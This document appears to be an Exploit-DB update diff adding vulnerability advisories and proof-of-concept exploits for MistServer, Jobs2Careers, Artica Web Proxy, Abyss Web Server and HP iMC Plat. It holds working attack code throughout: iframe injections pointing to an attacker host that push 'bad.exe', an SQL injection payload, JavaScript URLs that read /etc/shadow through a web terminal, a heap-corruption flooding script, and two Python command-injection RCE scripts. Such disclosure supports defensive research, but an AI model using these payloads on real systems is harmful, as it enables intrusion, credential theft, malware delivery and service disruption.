DB: 2017-12-02

8 changes to exploits/shellcodes

6 new exploits/shellcodes

Abyss Web Server < 2.11.6 - Heap Memory Corruption

HP iMC Plat 7.2 - Remote Code Execution

HP iMC Plat 7.2 - Remote Code Execution (2)

Kodi 15 - Web Interface Arbitrary File Access (
Kodi 15 - Web Interface Arbitrary File Access
Jobs2Careers / Coroflot Clone - SQL Injection
MistServer 2.12 - Cross-Site Scripting
Artica Web Proxy 3.06 - Remote Code Execution

exploits/linux/dos/43199.c

@@ -1,6 +1,7 @@
 // EDB Note: Source ~ https://medium.com/bindecy/huge-dirty-cow-cve-2017-1000405-110eca132de0
 // EDB Note: Source ~ https://github.com/bindecy/HugeDirtyCowPOC
-// Author Note: Before running, make sure to set transparent huge pages to "always": `echo always | sudo tee /sys/kernel/mm/transparent_hugepage/enabled`
+// Author Note: Before running, make sure to set transparent huge pages to "always": 
+//                      `echo always | sudo tee /sys/kernel/mm/transparent_hugepage/enabled`
 //
 
 //

exploits/linux/webapps/38833.txt

@@ -3,8 +3,7 @@
 # Date: 25-11-2015
 # Contact: https://twitter.com/mpronk89
 # Software Link: http://kodi.tv/
-# Original report:
-http://forum.kodi.tv/showthread.php?tid=144110&pid=2170305#pid2170305
+# Original report: http://forum.kodi.tv/showthread.php?tid=144110&pid=2170305#pid2170305
 # Version: v15
 # Tested on: linux
 # CVE : n/a

exploits/multiple/webapps/43205.txt

@@ -0,0 +1,94 @@
+[+] Credits: John Page (aka Hyp3rlinX)		
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/MIST-SERVER-v2.12-UNAUTHENTICATED-PERSISTENT-XSS-CVE-2017-16884.txt
+[+] ISR: ApparitionSec            
+ 
+
+
+Vendor:
+=============
+mistserver.org
+
+
+
+Product:
+===========
+MistServer v2.12
+
+
+MistServer is a full-featured, next-generation streaming media toolkit for OTT (internet streaming).
+
+
+
+Vulnerability Type:
+===================
+Unauthenticated Persistent XSS
+
+
+
+CVE Reference:
+==============
+CVE-2017-16884
+
+
+
+Security Issue:
+================
+Unauthenticated remote attackers can inject persistent XSS payloads by making failed HTTP authentication requests. Attacker supplied payloads will
+get stored in the server logs as failed authentication requests alerts. Mistserver echoes back the unsanitized payloads in Mist Servers Web interface
+automatically due to automatic refresh of the UI every few seconds, thereby, executing arbitrary attacker supplied code. 
+
+
+
+References:
+============
+https://news.mistserver.org/news/78/Stable+release+2.13+now+available%21
+
+
+
+Exploit/POC:
+=============
+import requests
+
+#INJECT IFRAME
+requests.get('http://VICTIM-IP:4242/admin/api?callback=&command={"authorize":{"password":"666","username":"<iframe src=\'http://ATTACKER-IP\'></iframe>"}}')
+
+#PUSH MALWARE
+requests.get('http://VICTIM-IP:4242/admin/api?callback=&command={"authorize":{"password":"666","username":"<iframe src=\'http://ATTACKER-IP/bad.exe\'></iframe>"}}')
+
+#EXFIL LOGS
+requests.get('http://VICTIM-IP:4242/admin/api?command={"authorize":{"password":"666","username":"<script>alert(document.body.innerHTML)</script>"}}')
+
+
+
+Network Access:
+===============
+Remote
+
+
+
+
+Severity:
+=========
+High
+
+
+
+Disclosure Timeline:
+=============================
+Vendor Notification:  October 19, 2017
+Vendor Acknowledgement : October 20, 2017
+Vendor Released Fix : November 30, 2017
+December 1, 2017 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx

exploits/php/webapps/43203.txt

@@ -0,0 +1,37 @@
+# Exploit Title: Jobs2Careers / Coroflot Clone - SQL Injection
+# Date: 2017-11-30
+# Exploit Author: 8bitsec
+# Vendor Homepage: http://www.i-netsolution.com/
+# Software Link: http://www.i-netsolution.com/product/jobs2careers-coroflot-jobs-clone-script/
+# Version: 30 November 17
+# Tested on: [Kali Linux 2.0 | Mac OS 10.13.1]
+# Email: contact@8bitsec.io
+# Contact: https://twitter.com/_8bitsec
+
+Release Date:
+=============
+2017-11-30
+
+Product & Service Introduction:
+===============================
+Our readymade PHP job site script make your own job portal website set in motion.
+
+Technical Details & Description:
+================================
+
+SQL injection on [keyword] parameter.
+
+Proof of Concept (PoC):
+=======================
+
+SQLi:
+
+https://localhost/[path]/onlinejobsearch/job
+
+Parameter: keyword (POST)
+    Type: error-based
+    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+    Payload: keyword=xxxx') AND (SELECT 6727 FROM(SELECT COUNT(*),CONCAT(0x7176707a71,(SELECT (ELT(6727=6727,1))),0x7178627671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ('zImA'='zImA&location_name[]=
+    
+==================
+8bitsec - [https://twitter.com/_8bitsec]

exploits/php/webapps/43206.txt

@@ -0,0 +1,90 @@
+[+] Credits: John Page (aka Hyp3rlinX)		
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/ARTICA-WEB-PROXY-v3.06-REMOTE-CODE-EXECUTION-CVE-2017-17055.txt
+[+] ISR: ApparitionSec            
+ 
+
+
+Vendor:
+=======
+www.articatech.com
+
+
+
+Product:
+=========
+Artica Web Proxy v.3.06.112216 
+
+
+Artica Tech offers a powerful but easy-to-use Enterprise-Class Web Security and Control solution,
+usually the preserve of large companies. ARTICA PROXY Solutions have been developed over the past
+10 years as an Open Source Project to help SMEs and public bodies protect both their organizations
+and employees from risks posed by the Internet.
+
+
+
+Vulnerability Type:
+===================
+Remote Code Execution 
+
+
+
+CVE Reference:
+==============
+CVE-2017-17055
+
+
+
+Security Issue:
+================
+Artica offers a web based command line emulator 'system.terminal.php' (shell), allowing authenticated users to execute OS commands as root. 
+However, artica fails to sanitize the following HTTP request parameter $_GET["username-form-id"] used in 'freeradius.users.php'.
+
+Therefore, authenticated users who click an attacker supplied link or visit a malicious webpage, can result in execution of attacker
+supplied Javascript code. Which is then used to execute unauthorized Operating System Commands (RCE) on the affected Artica Web Proxy Server
+abusing the system.terminal.php functionality. Result is attacker takeover of the artica server.
+
+
+
+Exploit/POC:
+=============
+1) Steal artica Server "/etc/shadow" password file.
+
+https://VICTIM-IP:9000/freeradius.users.php?username-form-id=%3C%2Fscript%3E%3Cscript%3Evar%20xhr=new%20XMLHttpRequest();xhr.onreadystatechange=function(){if(xhr.status==200){alert(xhr.responseText);}};xhr.open(%27POST%27,%27https://VICTIM-IP:9000/system.terminal.php%27,true);xhr.setRequestHeader(%27Content-type%27,%27application/x-www-form-urlencoded%27);xhr.send(%27cmdline=cat%20/etc/shadow%27);%3C%2Fscript%3E%3Cscript%3E
+
+2) Write file 'PWN' to /tmp dir.
+
+https://VICTIM-IP:9000/freeradius.users.php?username-form-id=%3C%2Fscript%3E%3Cscript%3Evar%20xhr=new%20XMLHttpRequest();xhr.onreadystatechange=function(){if(xhr.status==200){alert(xhr.responseText);}};xhr.open(%27POST%27,%27https://VICTIM-IP:9000/system.terminal.php%27,true);xhr.setRequestHeader(%27Content-type%27,%27application/x-www-form-urlencoded%27);xhr.send(%27cmdline=touch%20/tmp/PWN%27);%3C%2Fscript%3E%3Cscript%3E
+
+
+Network Access:
+===============
+Remote
+
+
+
+
+Severity:
+=========
+High
+
+
+
+Disclosure Timeline:
+=============================
+Vendor Notification: November 28, 2017  
+Vendor Confirms Vulnerability : November 28, 2017
+Vendor Reply "Fixed in 3.06.112911 / ISO released" : November 29, 2017
+December 1, 2017  : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx

exploits/windows/dos/43207.txt

@@ -0,0 +1,266 @@
+[+] Credits: John Page (aka HyP3rlinX)		
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/ABYSS-WEB-SERVER-MEMORY-HEAP-CORRUPTION.txt
+[+] ISR: ApparitionSec            
+ 
+
+
+Vendor:
+==========
+aprelium.com
+
+
+
+Product:
+===========
+Abyss Web Server < v2.11.6
+
+
+
+Vulnerability Type:
+===================
+Memory Heap Corruption
+
+
+
+CVE Reference:
+==============
+N/A
+
+
+
+Security Issue:
+================
+Possible to corrupt heap memory of the Abyss Web Server by sending specially crafted HTML in repeated HTTP POST requests.
+Users should upgrade to latest version v2.11.6.
+
+
+GetUrlPageData2 (WinHttp) failed: 12002.
+
+FAULTING_IP: 
+msvcrt!memcpy+5a
+75e49b60 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
+
+EXCEPTION_RECORD:  ffffffff -- (.exr 0xffffffffffffffff)
+ExceptionAddress: 75e49b60 (msvcrt!memcpy+0x0000005a)
+   ExceptionCode: c0000005 (Access violation)
+  ExceptionFlags: 00000000
+NumberParameters: 2
+   Parameter[0]: 00000000
+   Parameter[1]: 003b9000
+Attempt to read from address 003b9000
+
+CONTEXT:  00000000 -- (.cxr 0x0;r)
+eax=00000000 ebx=075c33f8 ecx=000efd46 edx=00000002 esi=075c33b8 edi=0651edb0
+eip=77670c52 esp=0651ea70 ebp=0651ea80 iopl=0         nv up ei pl zr na pe nc
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
+ntdll!ZwGetContextThread+0x12:
+77670c52 83c404          add     esp,4
+
+PROCESS_NAME:  abyssws.exe
+
+ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s.
+
+EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s.
+
+EXCEPTION_PARAMETER1:  00000000
+
+EXCEPTION_PARAMETER2:  003b9000
+
+READ_ADDRESS:  003b9000 
+
+FOLLOWUP_IP: 
+abyssws+413d9
+004413d9 59              pop     ecx
+
+NTGLOBALFLAG:  0
+
+APPLICATION_VERIFIER_FLAGS:  0
+
+APP:  abyssws.exe
+
+ANALYSIS_VERSION: 6.3.9600.17298 (debuggers(dbg).141024-1500) x86fre
+
+LAST_CONTROL_TRANSFER:  from 0043f840 to 75e49b60
+
+FAULTING_THREAD:  ffffffff
+
+BUGCHECK_STR:  APPLICATION_FAULT_ACTIONABLE_HEAP_CORRUPTION_heap_failure_block_not_busy_INVALID_POINTER_READ_PROBABLYEXPLOITABLE
+
+PRIMARY_PROBLEM_CLASS:  ACTIONABLE_HEAP_CORRUPTION_heap_failure_block_not_busy_PROBABLYEXPLOITABLE
+
+DEFAULT_BUCKET_ID:  ACTIONABLE_HEAP_CORRUPTION_heap_failure_block_not_busy_PROBABLYEXPLOITABLE
+
+STACK_TEXT:  
+777542a8 776cd9bc ntdll!RtlFreeHeap+0x64
+777542ac 75e498cd msvcrt!free+0xcd
+777542b0 004413d9 abyssws+0x413d9
+777542b4 004089d0 abyssws+0x89d0
+777542b8 0040a607 abyssws+0xa607
+777542bc 0040bd58 abyssws+0xbd58
+777542c0 0040cb5b abyssws+0xcb5b
+
+
+SYMBOL_STACK_INDEX:  2
+
+SYMBOL_NAME:  abyssws+413d9
+
+FOLLOWUP_NAME:  MachineOwner
+
+MODULE_NAME: abyssws
+
+IMAGE_NAME:  abyssws.exe
+
+DEBUG_FLR_IMAGE_TIMESTAMP:  5807a3cb
+
+STACK_COMMAND:  dps 777542a8 ; kb
+
+FAILURE_BUCKET_ID:  ACTIONABLE_HEAP_CORRUPTION_heap_failure_block_not_busy_PROBABLYEXPLOITABLE_c0000005_abyssws.exe!Unknown
+
+BUCKET_ID:  APPLICATION_FAULT_ACTIONABLE_HEAP_CORRUPTION_heap_failure_block_not_busy_INVALID_POINTER_READ_PROBABLYEXPLOITABLE_abyssws+413d9
+
+ANALYSIS_SOURCE:  UM
+
+FAILURE_ID_HASH_STRING:  um:actionable_heap_corruption_heap_failure_block_not_busy_probablyexploitable_c0000005_abyssws.exe!unknown
+
+FAILURE_ID_HASH:  {0ba3122b-4351-5a85-a0ea-294a6ce77042}
+
+Followup: MachineOwner
+---------
+
+
+///////////////////////////////////////////////
+
+
+The stored exception information can be accessed via .ecxr.
+(2740.30b8): Access violation - code c0000005 (first/second chance not available)
+eax=00000000 ebx=075c33f8 ecx=000efd46 edx=00000002 esi=075c33b8 edi=0651edb0
+eip=77670c52 esp=0651ea70 ebp=0651ea80 iopl=0         nv up ei pl zr na pe nc
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
+ntdll!ZwGetContextThread+0x12:
+77670c52 83c404          add     esp,4
+0:011> !load winext/msec
+0:011> !exploitable
+
+!exploitable 1.6.0.0
+Exploitability Classification: PROBABLY_EXPLOITABLE
+Recommended Bug Title: Probably Exploitable - Read Access Violation on Block Data Move starting at msvcrt!memcpy+0x0000000000000250 (Hash=0xb1db8cd3.0x508907b2)
+
+This is a read access violation in a block data move, and is therefore classified as probably exploitable.
+
+?
+
+References:
+============
+https://aprelium.com/news/abws2-11-6.html
+
+
+
+Exploit/POC:
+=============
+Cause Heap Corruption in Abyss Server.
+
+<!DOCTYPE>
+<html>
+<body>
+<script>
+//Abyss Web Server Memory (heap) Corruption POC
+//Discover by hyp3rlinx
+//Error code: 0xc0000374 is STATUS_HEAP_CORRUPTION
+//0xc0000374 - heap has been corrupted.
+//=======================================
+window.onerror=function(){
+return true
+}
+</script>
+
+<script>
+var target='http://VICTIM-IP:9999/hosts/host@0/edit/ipcontrol';
+
+function mk_iframe_targets(f){
+var tmp = document.createElement('IFRAME')
+tmp.style='display:none'
+tmp.name='hidden-frame'+f
+return tmp
+}
+
+function mk_inputs(id,name,val){
+var input=document.createElement('INPUT')
+input.type='hidden'
+input.id=id
+input.name=name
+input.value=val
+return input
+}
+
+function mk_forms(name,f){
+var PAYLOAD='CORRUPT'
+var tmp = document.createElement('FORM')
+tmp.method='POST'
+tmp.action=target
+tmp.target='hidden-frame'+f
+tmp.name = name
+tmp.style='display:none'
+tmp.appendChild(mk_inputs('token'+f,'$$xxvxd',PAYLOAD))
+tmp.appendChild(mk_inputs('','/hosts/host@0/edit/ipcontrol/rules/rules.badd',PAYLOAD))
+
+return tmp
+}
+
+var NUM_FORMS=50
+var form_arr = new Array
+for(var f =0; f < NUM_FORMS; f++){
+
+ var ifrms = mk_iframe_targets(f)
+ document.body.appendChild(ifrms)
+ 
+ var aform=mk_forms('form'+f,f)
+ form_arr.push(aform)
+ 
+ document.body.appendChild( aform )
+ 
+}
+
+function engine0(){
+for(var i = 0; i< NUM_FORMS; i++){
+form_arr[i].submit()
+}
+}
+
+window.setInterval(engine0, 5)
+
+</script>
+
+
+
+Network Access:
+===============
+Remote
+
+
+
+
+Severity:
+=========
+Medium
+
+
+
+Disclosure Timeline:
+=============================================
+Vendor Notification : September 21, 2017
+Vendor Acknowledgement : September 22, 2017
+Vendor Released New Version : November 30, 2017
+December 1, 2017 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx

exploits/windows/remote/43195.py

@@ -0,0 +1,43 @@
+#!/opt/local/bin/python2.7
+
+# Exploit Title: HP iMC Plat 7.2 dbman Opcode 10007 Command Injection RCE
+# Date: 11-28-2017
+# Exploit Author: Chris Lyne (@lynerc)
+# Vendor Homepage: www.hpe.com
+# Software Link: https://h10145.www1.hpe.com/Downloads/DownloadSoftware.aspx?SoftwareReleaseUId=16759&ProductNumber=JG747AAE&lang=en&cc=us&prodSeriesId=4176535&SaidNumber=
+# Version: iMC PLAT v7.2 (E0403) Standard
+# Tested on: Windows Server 2008 R2 Enterprise 64-bit
+# CVE : CVE-2017-5817
+# See Also: http://www.zerodayinitiative.com/advisories/ZDI-17-341/
+
+# note that this PoC will create a file 'C:\poc.txt'
+
+import socket, sys
+
+ip = '192.168.1.74'
+port = 2810
+
+command = "echo PoC 12345 > C:\\poc.txt" # command to run
+
+sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+sock.connect((ip, port))
+
+buf = "\x00\x00\x27\x17\x00\x00\x00"
+buf += chr(109 + 10 + len(command))
+buf += "\x30\x81"
+buf += chr(109 + 7 + len(command))
+buf += "\x04\x0c"
+buf += ip
+buf += ("\x04\x04\x41\x41\x41\x41\x04"
+"\x04\x42\x42\x42\x42\x04\x04\x43\x43\x43\x43\x02\x01\x01\x02\x01"
+"\x03\x04\x06\x4d\x41\x4e\x55\x41\x4c\x04\x04\x44\x44\x44\x44\x04")
+buf += chr(len(command) + 7)
+buf += "\x73\x61\x22\x26\x20"
+buf += command
+buf += ("\x20\x26\x04\x08\x70\x61\x73\x73\x77\x6f\x72\x64\x04"
+"\x04\x00\x00\x04\x57\x04\x08\x69\x6e\x73\x74\x61\x6e\x63\x65\x04"
+"\x04\x45\x45\x45\x45\x04\x04\x46\x46\x46\x46\x04\x04\x47\x47\x47"
+"\x47\x04\x04\x48\x48\x48\x48\x30\x00\x02\x01\x01")
+sock.send(buf)
+
+sock.close()

exploits/windows/remote/43198.py

@@ -0,0 +1,56 @@
+#!/opt/local/bin/python2.7
+
+# Exploit Title: HP iMC Plat 7.2 dbman Opcode 10008 Command Injection RCE
+# Date: 11-29-2017
+# Exploit Author: Chris Lyne (@lynerc)
+# Vendor Homepage: www.hpe.com
+# Software Link: https://h10145.www1.hpe.com/Downloads/DownloadSoftware.aspx?SoftwareReleaseUId=16759&ProductNumber=JG747AAE&lang=en&cc=us&prodSeriesId=4176535&SaidNumber=
+# Version: iMC PLAT v7.2 (E0403) Standard
+# Tested on: Windows Server 2008 R2 Enterprise 64-bit
+# CVE : CVE-2017-5816
+# See Also: http://www.zerodayinitiative.com/advisories/ZDI-17-340/
+
+# note that this PoC will create a file 'C:\10008.txt'
+
+from pyasn1.type.univ import *
+from pyasn1.type.namedtype import *
+from pyasn1.codec.ber import encoder
+import struct
+import binascii
+import socket, sys
+
+ip = '192.168.1.74'
+port = 2810
+payload = "whoami > C:\\10008.txt"
+opcode = 10008
+
+sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+sock.connect((ip, port))
+
+class DbmanMsg(Sequence):
+    componentType = NamedTypes(
+        NamedType('dbIp', OctetString()),
+        NamedType('iDBType', Integer()),
+        NamedType('dbInstance', OctetString()),
+        NamedType('dbSaUserName', OctetString()),
+        NamedType('dbSaPassword', OctetString()),
+        NamedType('strOraDbIns', OctetString())
+    )
+
+msg = DbmanMsg()
+
+msg['dbIp'] = ip
+msg['iDBType'] = 4
+msg['dbInstance'] = "a\"& " + payload + " &"
+msg['dbSaUserName'] = "b"
+msg['dbSaPassword'] = "c"
+msg['strOraDbIns'] = "d"
+
+encodedMsg = encoder.encode(msg, defMode=True)
+msgLen = len(encodedMsg)
+values = (opcode, msgLen, encodedMsg)
+s = struct.Struct(">ii%ds" % msgLen)
+packed_data = s.pack(*values)
+
+sock.send(packed_data)
+sock.close()

files_exploits.csv

@@ -5763,6 +5763,7 @@ id,file,description,date,author,type,platform,port
 43189,exploits/android/dos/43189.py,"Android Gmail < 7.11.5.176568039 - Directory Traversal in Attachment Download",2017-11-28,"Google Security Research",dos,android,
 43194,exploits/linux/dos/43194.txt,"QEMU - NBD Server Long Export Name Stack Buffer Overflow",2017-11-29,"Eric Blake",dos,linux,
 43199,exploits/linux/dos/43199.c,"Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page",2017-11-30,Bindecy,dos,linux,
+43207,exploits/windows/dos/43207.txt,"Abyss Web Server < 2.11.6 - Heap Memory Corruption",2017-12-01,hyp3rlinx,dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -15992,7 +15993,9 @@ id,file,description,date,author,type,platform,port
 43145,exploits/windows/remote/43145.py,"Dup Scout Enterprise 10.0.18 - 'Login' Remote Buffer Overflow",2017-11-14,sickness,remote,windows,80
 42886,exploits/windows/remote/42886.py,"Sync Breeze Enterprise 10.1.16 - 'POST' Remote Buffer Overflow",2017-10-20,mschenk,remote,windows,
 43163,exploits/windows/remote/43163.txt,"Microsoft Office - OLE Remote Code Execution",2017-11-20,embedi,remote,windows,
+43195,exploits/windows/remote/43195.py,"HP iMC Plat 7.2 - Remote Code Execution",2017-11-28,"Chris Lyne",remote,windows,
 43193,exploits/unix/remote/43193.rb,"pfSense - Authenticated Group Member Remote Command Execution (Metasploit)",2017-11-29,Metasploit,remote,unix,443
+43198,exploits/windows/remote/43198.py,"HP iMC Plat 7.2 - Remote Code Execution (2)",2017-11-29,"Chris Lyne",remote,windows,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -36327,7 +36330,7 @@ id,file,description,date,author,type,platform,port
 38831,exploits/php/webapps/38831.txt,"HumHub 0.11.2/0.20.0-beta.2 - SQL Injection",2015-11-30,"LSE Leading Security Experts GmbH",webapps,php,80
 38828,exploits/php/webapps/38828.php,"Limonade Framework - 'limonade.php' Local File Disclosure",2013-11-17,"Yashar shahinzadeh",webapps,php,
 38830,exploits/php/webapps/38830.txt,"MyCustomers CMS 1.3.873 - SQL Injection",2015-11-30,"Persian Hack Team",webapps,php,80
-38833,exploits/linux/webapps/38833.txt,"Kodi 15 - Web Interface Arbitrary File Access (",2015-12-01,"Machiel Pronk",webapps,linux,
+38833,exploits/linux/webapps/38833.txt,"Kodi 15 - Web Interface Arbitrary File Access",2015-12-01,"Machiel Pronk",webapps,linux,
 38840,exploits/hardware/webapps/38840.txt,"Belkin N150 Wireless Router F9K1009 v1 - Multiple Vulnerabilities",2015-12-01,"Rahul Pratap Singh",webapps,hardware,80
 38841,exploits/php/webapps/38841.txt,"ZenPhoto 1.4.10 - Local File Inclusion",2015-12-01,hyp3rlinx,webapps,php,80
 38842,exploits/php/webapps/38842.txt,"Testa OTMS - Multiple SQL Injections",2013-11-13,"Ashiyane Digital Security Team",webapps,php,
@@ -38235,3 +38238,6 @@ id,file,description,date,author,type,platform,port
 43188,exploits/hardware/webapps/43188.txt,"ZTE ZXDSL 831CII - Improper Access Restrictions",2017-11-27,"Ibad Shah",webapps,hardware,
 43190,exploits/cgi/webapps/43190.py,"Synology StorageManager 5.2 - Root Remote Command Execution",2017-11-28,SecuriTeam,webapps,cgi,
 43196,exploits/php/webapps/43196.txt,"WordPress Plugin WooCommerce 2.0/3.0 - Directory Traversal",2017-11-28,Fu2x2000,webapps,php,
+43203,exploits/php/webapps/43203.txt,"Jobs2Careers / Coroflot Clone - SQL Injection",2017-11-30,8bitsec,webapps,php,
+43205,exploits/multiple/webapps/43205.txt,"MistServer 2.12 - Cross-Site Scripting",2017-12-01,hyp3rlinx,webapps,multiple,
+43206,exploits/php/webapps/43206.txt,"Artica Web Proxy 3.06 - Remote Code Execution",2017-12-01,hyp3rlinx,webapps,php,